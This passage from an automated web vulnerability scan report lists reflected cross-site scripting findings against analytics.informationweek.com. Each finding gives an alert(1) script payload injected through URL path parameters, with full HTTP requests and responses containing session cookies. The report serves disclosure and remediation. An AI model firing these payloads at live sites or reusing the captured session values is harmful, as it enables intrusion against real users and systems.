Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:26 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... bb1c645bd%2F81%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
3.22. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 2]
The value of REST URL parameter 2 is copied into an HTML comment. The payload 354b7--><script>alert(1)</script>403b10a048c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 403b10a048c%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
3.23. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 3]
The value of REST URL parameter 3 is copied into an HTML comment. The payload e8b04--><script>alert(1)</script>6a5a5123e13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E6a5a5123e13%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
3.24. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 4]
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7446c--><script>alert(1)</script>3b3d6a8badb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:10 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3E3b3d6a8badb%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
3.25. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 5]
The value of REST URL parameter 5 is copied into an HTML comment. The payload 240a5--><script>alert(1)</script>fd524b9da39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ipt%3Efd524b9da39&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39"> ...[SNIP]...
3.26. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ee31f--><script>alert(1)</script>cb09c6d79c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Ecb09c6d79c0%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1"> ...[SNIP]...
3.27. http://analytics.informationweek.com/css/prettyPhoto.css [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload 338e7--><script>alert(1)</script>e2d83de194 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... p%3A%2F%2Fanalytics.informationweek.com%2Fcss338e7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee2d83de194%2FprettyPhoto.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css"> ...[SNIP]...
3.28. http://analytics.informationweek.com/css/prettyPhoto.css [REST URL parameter 2]
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6cd90--><script>alert(1)</script>e12e4455fca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cs.informationweek.com%2Fcss%2FprettyPhoto.css6cd90--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee12e4455fca&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca"> ...[SNIP]...
3.29. http://analytics.informationweek.com/css/style.css [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload eb92e--><script>alert(1)</script>cf8dc57c4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ce=http%3A%2F%2Fanalytics.informationweek.com%2Fcsseb92e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecf8dc57c4b%2Fstyle.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css"> ...[SNIP]...
3.30. http://analytics.informationweek.com/css/style.css [REST URL parameter 2]
The value of REST URL parameter 2 is copied into an HTML comment. The payload 11fb0--><script>alert(1)</script>769c3628931 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css/style.css11fb0--><script>alert(1)</script>769c3628931 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fcss%2Fstyle.css11fb0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E769c3628931&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/style.css11fb0--><script>alert(1)</script>769c3628931"> ...[SNIP]...
3.31. http://analytics.informationweek.com/gsearch [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload 94804--><script>alert(1)</script>7e3b598135e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /gsearch94804--><script>alert(1)</script>7e3b598135e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:43:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rvice=http%3A%2F%2Fanalytics.informationweek.com%2Fgsearch94804--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e3b598135e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/gsearch94804--><script>alert(1)</script>7e3b598135e"> ...[SNIP]...
3.32. http://analytics.informationweek.com/index/caslogin [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload 73f79--><script>alert(1)</script>30362e0897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index73f79--><script>alert(1)</script>30362e0897/caslogin HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:21:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... http%3A%2F%2Fanalytics.informationweek.com%2Findex73f79--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E30362e0897%2Fcaslogin&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index73f79--><script>alert(1)</script>30362e0897/caslogin"> ...[SNIP]...
3.33. http://analytics.informationweek.com/index/caslogin [REST URL parameter 2]
The value of REST URL parameter 2 is copied into an HTML comment. The payload d2619--><script>alert(1)</script>69a69bed269 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index/caslogind2619--><script>alert(1)</script>69a69bed269 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:21:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2Fanalytics.informationweek.com%2Findex%2Fcaslogind2619--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E69a69bed269&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index/caslogind2619--><script>alert(1)</script>69a69bed269"> ...[SNIP]...
3.34. http://analytics.informationweek.com/join [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload fcd39--><script>alert(1)</script>3d3330c2607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /joinfcd39--><script>alert(1)</script>3d3330c2607 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:39:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... gin?service=http%3A%2F%2Fanalytics.informationweek.com%2Fjoinfcd39--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3d3330c2607&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/joinfcd39--><script>alert(1)</script>3d3330c2607"> ...[SNIP]...
3.35. http://analytics.informationweek.com/js/getdata.js [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload fbbbc--><script>alert(1)</script>3cd9c91875d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
